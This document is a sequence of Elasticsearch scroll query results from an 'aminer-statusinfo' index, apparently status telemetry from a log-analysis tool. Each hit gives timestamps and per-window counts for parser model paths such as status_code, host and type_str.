{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"nTPpLXYBIkOurnXXC4e7","_score":1.0,"_source":{"FromTime":1.60708800617559E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":36,"/parser/model/type_str":17371,"/parser/model/classification":0,"/parser/model/status_code":2,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:16.212Z","ToTime":1.607088016175659E9,"fromtimestamp":"2020-12-04T13:20:06.175Z","totimestamp":"2020-12-04T13:20:16.175Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ojPpLXYBIkOurnXXNodQ","_score":1.0,"_source":{"FromTime":1.607088017076398E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":167,"/parser/model/type_str":10246,"/parser/model/classification":0,"/parser/model/status_code":80,"/parser/model/host":14,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:27.113Z","ToTime":1.607088027076495E9,"fromtimestamp":"2020-12-04T13:20:17.076Z","totimestamp":"2020-12-04T13:20:27.076Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"qDPpLXYBIkOurnXXXoc-","_score":1.0,"_source":{"FromTime":1.607088027294802E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":23,"/parser/model/type_str":1039,"/parser/model/classification":0,"/parser/model/status_code":13,"/parser/model/host":0,"/parser/model/sp":1},"timestamp":"2020-12-04T13:20:37.335Z","ToTime":1.607088037294874E9,"fromtimestamp":"2020-12-04T13:20:27.294Z","totimestamp":"2020-12-04T13:20:37.294Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"rjPpLXYBIkOurnXXiIco","_score":1.0,"_source":{"FromTime":1.607088038027988E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":77,"/parser/model/type_str":3861,"/parser/model/classification":0,"/parser/model/status_code":23,"/parser/model/host":10,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:48.065Z","ToTime":1.607088048028038E9,"fromtimestamp":"2020-12-04T13:20:38.027Z","totimestamp":"2020-12-04T13:20:48.028Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"tDPpLXYBIkOurnXXsYfd","_score":1.0,"_source":{"FromTime":1.6070880487057E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":23,"/parser/model/type_str":3633,"/parser/model/classification":0,"/parser/model/status_code":2,"/parser/model/host":9,"/parser/model/sp":3},"timestamp":"2020-12-04T13:20:58.742Z","ToTime":1.607088058705801E9,"fromtimestamp":"2020-12-04T13:20:48.705Z","totimestamp":"2020-12-04T13:20:58.705Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"uDPpLXYBIkOurnXX3Idz","_score":1.0,"_source":{"FromTime":1.607088059606552E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":84,"/parser/model/type_str":15434,"/parser/model/classification":0,"/parser/model/status_code":27,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:09.644Z","ToTime":1.607088069606614E9,"fromtimestamp":"2020-12-04T13:20:59.606Z","totimestamp":"2020-12-04T13:21:09.606Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"vTPqLXYBIkOurnXXA4f9","_score":1.0,"_source":{"FromTime":1.607088069728031E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":10,"/parser/model/type_str":481,"/parser/model/classification":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:19.766Z","ToTime":1.607088079728122E9,"fromtimestamp":"2020-12-04T13:21:09.728Z","totimestamp":"2020-12-04T13:21:19.728Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"wjPqLXYBIkOurnXXLoeH","_score":1.0,"_source":{"FromTime":1.607088080617636E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":72,"/parser/model/type_str":4831,"/parser/model/classification":0,"/parser/model/status_code":33,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:30.656Z","ToTime":1.607088090617719E9,"fromtimestamp":"2020-12-04T13:21:20.617Z","totimestamp":"2020-12-04T13:21:30.617Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"xzPqLXYBIkOurnXXVYfA","_score":1.0,"_source":{"FromTime":1.607088090628122E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":198,"/parser/model/type_str":16702,"/parser/model/classification":0,"/parser/model/status_code":31,"/parser/model/host":6,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:40.697Z","ToTime":1.607088100628174E9,"fromtimestamp":"2020-12-04T13:21:30.628Z","totimestamp":"2020-12-04T13:21:40.628Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"3zPrLXYBIkOurnXXK4c3","_score":1.0,"_source":{"FromTime":1.607088145306266E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":426,"/parser/model/type_str":51066,"/parser/model/php":0,"/parser/model/status_code":139,"/parser/model/host":47,"/parser/model/sp":4},"timestamp":"2020-12-04T13:22:35.344Z","ToTime":1.607088155306352E9,"fromtimestamp":"2020-12-04T13:22:25.306Z","totimestamp":"2020-12-04T13:22:35.306Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"4zPrLXYBIkOurnXXUodo","_score":1.0,"_source":{"FromTime":1.607088155324363E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":169,"/parser/model/type_str":22707,"/parser/model/php":0,"/parser/model/status_code":62,"/parser/model/host":6,"/parser/model/sp":0},"timestamp":"2020-12-04T13:22:45.377Z","ToTime":1.607088165324514E9,"fromtimestamp":"2020-12-04T13:22:35.324Z","totimestamp":"2020-12-04T13:22:45.324Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"6jPrLXYBIkOurnXXe4cc","_score":1.0,"_source":{"FromTime":1.607088165758297E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":378,"/parser/model/type_str":35426,"/parser/model/php":0,"/parser/model/status_code":80,"/parser/model/host":15,"/parser/model/sp":0},"timestamp":"2020-12-04T13:22:55.797Z","ToTime":1.607088175758337E9,"fromtimestamp":"2020-12-04T13:22:45.758Z","totimestamp":"2020-12-04T13:22:55.758Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"7jPrLXYBIkOurnXXpIcU","_score":1.0,"_source":{"FromTime":1.607088176247121E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":35,"/parser/model/type_str":2684,"/parser/model/php":0,"/parser/model/status_code":11,"/parser/model/host":7,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:06.284Z","ToTime":1.607088186247198E9,"fromtimestamp":"2020-12-04T13:22:56.247Z","totimestamp":"2020-12-04T13:23:06.247Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"8zPrLXYBIkOurnXXzYe8","_score":1.0,"_source":{"FromTime":1.607088186891987E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":22,"/parser/model/type_str":3552,"/parser/model/php":0,"/parser/model/status_code":8,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:16.949Z","ToTime":1.607088196892045E9,"fromtimestamp":"2020-12-04T13:23:06.891Z","totimestamp":"2020-12-04T13:23:16.892Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"-DPrLXYBIkOurnXX9Yed","_score":1.0,"_source":{"FromTime":1.60708819712081E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":39,"/parser/model/type_str":1110,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:27.157Z","ToTime":1.607088207120882E9,"fromtimestamp":"2020-12-04T13:23:17.120Z","totimestamp":"2020-12-04T13:23:27.120Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"_TPsLXYBIkOurnXXHocN","_score":1.0,"_source":{"FromTime":1.607088207472226E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":1741,"/parser/model/php":0,"/parser/model/status_code":9,"/parser/model/host":11,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:37.510Z","ToTime":1.607088217472315E9,"fromtimestamp":"2020-12-04T13:23:27.472Z","totimestamp":"2020-12-04T13:23:37.472Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ATPsLXYBIkOurnXXSIgE","_score":1.0,"_source":{"FromTime":1.607088218216699E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":24,"/parser/model/type_str":4167,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:48.252Z","ToTime":1.607088228216758E9,"fromtimestamp":"2020-12-04T13:23:38.216Z","totimestamp":"2020-12-04T13:23:48.216Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"CDPsLXYBIkOurnXXb4go","_score":1.0,"_source":{"FromTime":1.607088228236653E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":0,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:58.273Z","ToTime":1.607088238236712E9,"fromtimestamp":"2020-12-04T13:23:48.236Z","totimestamp":"2020-12-04T13:23:58.236Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"DDPsLXYBIkOurnXXl4jN","_score":1.0,"_source":{"FromTime":1.607088238639867E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":36,"/parser/model/type_str":2231,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:08.677Z","ToTime":1.607088248639983E9,"fromtimestamp":"2020-12-04T13:23:58.639Z","totimestamp":"2020-12-04T13:24:08.639Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"EDPsLXYBIkOurnXXv4hE","_score":1.0,"_source":{"FromTime":1.607088248719976E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":70,"/parser/model/type_str":5910,"/parser/model/php":0,"/parser/model/status_code":30,"/parser/model/host":9,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:18.781Z","ToTime":1.60708825872006E9,"fromtimestamp":"2020-12-04T13:24:08.719Z","totimestamp":"2020-12-04T13:24:18.720Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"FjPsLXYBIkOurnXX54gp","_score":1.0,"_source":{"FromTime":1.607088258956716E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":40,"/parser/model/type_str":1044,"/parser/model/php":0,"/parser/model/status_code":12,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:28.994Z","ToTime":1.607088268956817E9,"fromtimestamp":"2020-12-04T13:24:18.956Z","totimestamp":"2020-12-04T13:24:28.956Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"GjPtLXYBIkOurnXXEIj5","_score":1.0,"_source":{"FromTime":1.607088269659532E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":35,"/parser/model/type_str":3839,"/parser/model/php":0,"/parser/model/status_code":11,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:39.697Z","ToTime":1.607088279659616E9,"fromtimestamp":"2020-12-04T13:24:29.659Z","totimestamp":"2020-12-04T13:24:39.659Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"HzPtLXYBIkOurnXXOYhP","_score":1.0,"_source":{"FromTime":1.607088279986282E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":20,"/parser/model/type_str":1729,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:50.024Z","ToTime":1.607088289986358E9,"fromtimestamp":"2020-12-04T13:24:39.986Z","totimestamp":"2020-12-04T13:24:49.986Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"JTPtLXYBIkOurnXXYIjV","_score":1.0,"_source":{"FromTime":1.607088290105456E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":9,"/parser/model/type_str":488,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":2},"timestamp":"2020-12-04T13:25:00.142Z","ToTime":1.607088300105532E9,"fromtimestamp":"2020-12-04T13:24:50.105Z","totimestamp":"2020-12-04T13:25:00.105Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"KjPtLXYBIkOurnXXiIhn","_score":1.0,"_source":{"FromTime":1.607088300236322E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":16,"/parser/model/type_str":405,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:10.273Z","ToTime":1.607088310236405E9,"fromtimestamp":"2020-12-04T13:25:00.236Z","totimestamp":"2020-12-04T13:25:10.236Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"LjPtLXYBIkOurnXXsogA","_score":1.0,"_source":{"FromTime":1.607088310881677E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":22,"/parser/model/type_str":3525,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:20.921Z","ToTime":1.607088320881773E9,"fromtimestamp":"2020-12-04T13:25:10.881Z","totimestamp":"2020-12-04T13:25:20.881Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"NDPtLXYBIkOurnXX24gM","_score":1.0,"_source":{"FromTime":1.607088321391445E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":27,"/parser/model/type_str":2498,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:31.429Z","ToTime":1.607088331391522E9,"fromtimestamp":"2020-12-04T13:25:21.391Z","totimestamp":"2020-12-04T13:25:31.391Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ODPuLXYBIkOurnXXAoiV","_score":1.0,"_source":{"FromTime":1.607088331512345E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":12,"/parser/model/type_str":312,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:41.550Z","ToTime":1.607088341512401E9,"fromtimestamp":"2020-12-04T13:25:31.512Z","totimestamp":"2020-12-04T13:25:41.512Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"PTPuLXYBIkOurnXXKogl","_score":1.0,"_source":{"FromTime":1.607088341638619E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":490,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:51.677Z","ToTime":1.60708835163873E9,"fromtimestamp":"2020-12-04T13:25:41.638Z","totimestamp":"2020-12-04T13:25:51.638Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"QzPuLXYBIkOurnXXUYiA","_score":1.0,"_source":{"FromTime":1.607088351700008E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":4,"/parser/model/type_str":178,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:01.752Z","ToTime":1.607088361700072E9,"fromtimestamp":"2020-12-04T13:25:51.700Z","totimestamp":"2020-12-04T13:26:01.700Z","version":"1"}}]}} 